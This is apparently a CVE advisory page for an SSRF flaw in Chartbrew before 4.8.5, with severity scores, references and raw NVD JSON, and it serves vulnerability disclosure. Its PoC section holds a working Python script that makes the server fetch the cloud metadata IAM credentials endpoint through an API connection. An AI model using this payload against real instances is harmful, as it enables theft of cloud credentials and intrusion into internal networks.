CVE-2026-30232

Description

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:depomo:chartbrew:*:*:*:*:*:*:*:* - VULNERABLE

Chartbrew < 4.8.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit code example for CVE-2026-30232
# Target: Chartbrew instance
# Description: Send a request to the API data connection endpoint with an internal URL.

target_url = "http://vulnerable-chartbrew-instance.com/api/connections"
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "name": "Malicious Internal Scan",
    "type": "api",
    "options": {
        "url": malicious_url,
        "method": "GET"
    }
}

headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <VALID_USER_TOKEN>"
}

response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Connection created successfully. Server fetched internal metadata.")
else:
    print("[-] Failed to create connection.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30232
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30232
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30232/
[4] VulDB https://vuldb.com/cve/CVE-2026-30232
[5] https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1
[6] https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30232", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:21.323", "lastModified": "2026-04-14T17:26:55.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:depomo:chartbrew:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.5", "matchCriteriaId": "08F05A49-8201-4A07-8BE2-76EC535D7874"}]}]}], "references": [{"url": "https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}